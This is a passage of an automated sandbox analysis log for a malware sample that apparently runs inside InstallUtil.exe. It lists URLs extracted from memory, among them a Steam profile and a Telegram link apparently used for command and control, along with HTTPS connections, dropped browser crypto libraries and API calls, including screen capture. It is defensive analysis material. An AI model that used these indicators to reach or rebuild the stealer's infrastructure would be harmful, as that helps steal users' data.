                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: KFHJJD.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: KFHJJD.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: KFHJJD.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: HIIIEC.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/w
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: BGHJJD.4.drString found in binary or memory: https://support.mozilla.org
                        Source: BGHJJD.4.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: BGHJJD.4.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, IIEHJE.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: IIEHJE.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                        Source: InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, IIEHJE.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: IIEHJE.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: KFHJJD.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000137E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, HIIIEC.4.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                        Source: KFHJJD.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: BGHJJD.4.drString found in binary or memory: https://www.mozilla.org
                        Source: InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                        Source: BGHJJD.4.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/BKECAKFBGC
                        Source: BGHJJD.4.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: BGHJJD.4.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                        Source: BGHJJD.4.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: InstallUtil.exe, 00000004.00000002.2459809646.000000001C20C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                        Source: BGHJJD.4.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49741 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 49.12.106.214:443 -> 192.168.2.4:49742 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,4_2_00411F55
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040145B GetCurrentProcess,NtQueryInformationProcess,4_2_0040145B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C65ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,4_2_6C65ED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C69B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C69B700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C69B8C0 rand_s,NtQueryVirtualMemory,4_2_6C69B8C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C69B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,4_2_6C69B910
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C63F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C63F280
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeCode function: 0_2_00007FFD9B7F9E750_2_00007FFD9B7F9E75
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeCode function: 0_2_00007FFD9B7F18690_2_00007FFD9B7F1869
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041C4724_2_0041C472
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0042D9334_2_0042D933
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0042D1C34_2_0042D1C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0042D5614_2_0042D561
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041950A4_2_0041950A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0042DD1B4_2_0042DD1B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0042CD2E4_2_0042CD2E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041B7124_2_0041B712
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6335A04_2_6C6335A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6454404_2_6C645440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6A545C4_2_6C6A545C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6A542B4_2_6C6A542B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6AAC004_2_6C6AAC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C675C104_2_6C675C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C682C104_2_6C682C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C63D4E04_2_6C63D4E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C676CF04_2_6C676CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6464C04_2_6C6464C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C65D4D04_2_6C65D4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6934A04_2_6C6934A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C69C4A04_2_6C69C4A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C646C804_2_6C646C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C64FD004_2_6C64FD00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6605124_2_6C660512
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C65ED104_2_6C65ED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6985F04_2_6C6985F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C670DD04_2_6C670DD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6A6E634_2_6C6A6E63
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C63C6704_2_6C63C670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6546404_2_6C654640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C682E4E4_2_6C682E4E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C659E504_2_6C659E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C673E504_2_6C673E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C699E304_2_6C699E30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6856004_2_6C685600
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C677E104_2_6C677E10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6A76E34_2_6C6A76E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C63BEF04_2_6C63BEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C64FEF04_2_6C64FEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C694EA04_2_6C694EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C69E6804_2_6C69E680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C655E904_2_6C655E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C649F004_2_6C649F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6777104_2_6C677710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C63DFE04_2_6C63DFE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C666FF04_2_6C666FF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6877A04_2_6C6877A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C67F0704_2_6C67F070
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6588504_2_6C658850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C65D8504_2_6C65D850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C67B8204_2_6C67B820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6848204_2_6C684820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6478104_2_6C647810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C65C0E04_2_6C65C0E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6758E04_2_6C6758E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6A50C74_2_6C6A50C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6660A04_2_6C6660A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C64D9604_2_6C64D960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C68B9704_2_6C68B970
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6AB1704_2_6C6AB170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C65A9404_2_6C65A940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C63C9A04_2_6C63C9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C66D9B04_2_6C66D9B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6751904_2_6C675190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C6929904_2_6C692990
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C679A604_2_6C679A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C651AF04_2_6C651AF0
